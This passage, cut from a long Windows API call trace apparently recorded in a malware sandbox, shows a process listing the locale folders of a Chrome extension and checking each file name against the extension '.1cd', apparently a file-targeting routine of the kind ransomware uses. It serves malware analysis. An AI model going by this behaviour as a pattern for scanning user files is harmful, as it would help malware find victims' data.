ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.804] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.804] lstrlenW (lpString="messages.json") returned 13 [0052.804] lstrlenW (lpString=".1cd") returned 4 [0052.804] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.804] FindClose (in: hFindFile=0x3ef1700 | out: hFindFile=0x3ef1700) returned 1 [0052.804] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.804] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro", cAlternateFileName="")) returned 1 [0052.804] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro") returned 139 [0052.805] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.805] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.805] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.805] lstrlenW (lpString="messages.json") returned 13 [0052.805] lstrlenW (lpString=".1cd") returned 4 [0052.806] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.806] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.806] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.806] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru", cAlternateFileName="")) returned 1 [0052.806] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru") returned 139 [0052.806] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.806] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.806] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.806] lstrlenW (lpString="messages.json") returned 13 [0052.806] lstrlenW (lpString=".1cd") returned 4 [0052.806] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.806] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.807] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4032518 | out: hHeap=0x570000) returned 1 [0052.807] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk", cAlternateFileName="")) returned 1 [0052.807] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk") returned 139 [0052.807] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.808] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.808] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.808] lstrlenW (lpString="messages.json") returned 13 [0052.808] lstrlenW (lpString=".1cd") returned 4 [0052.808] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.808] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.808] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4032518 | out: hHeap=0x570000) returned 1 [0052.808] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl", cAlternateFileName="")) returned 1 [0052.808] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl") returned 139 [0052.808] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.808] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.808] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.809] lstrlenW (lpString="messages.json") returned 13 [0052.809] lstrlenW (lpString=".1cd") returned 4 [0052.809] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.809] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.809] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4032518 | out: hHeap=0x570000) returned 1 [0052.809] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr", cAlternateFileName="")) returned 1 [0052.809] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr") returned 139 [0052.809] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.810] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.810] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.810] lstrlenW (lpString="messages.json") returned 13 [0052.810] lstrlenW (lpString=".1cd") returned 4 [0052.810] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.810] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.810] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4032518 | out: hHeap=0x570000) returned 1 [0052.810] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv", cAlternateFileName="")) returned 1 [0052.810] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv") returned 139 [0052.810] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.811] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.811] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.811] lstrlenW (lpString="messages.json") returned 13 [0052.811] lstrlenW (lpString=".1cd") returned 4 [0052.811] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.811] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.811] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4032518 | out: hHeap=0x570000) returned 1 [0052.811] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="th", cAlternateFileName="")) returned 1 [0052.811] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th") returned 139 [0052.811] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.812] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.812] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.812] lstrlenW (lpString="messages.json") returned 13 [0052.812] lstrlenW (lpString=".1cd") returned 4 [0052.812] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, 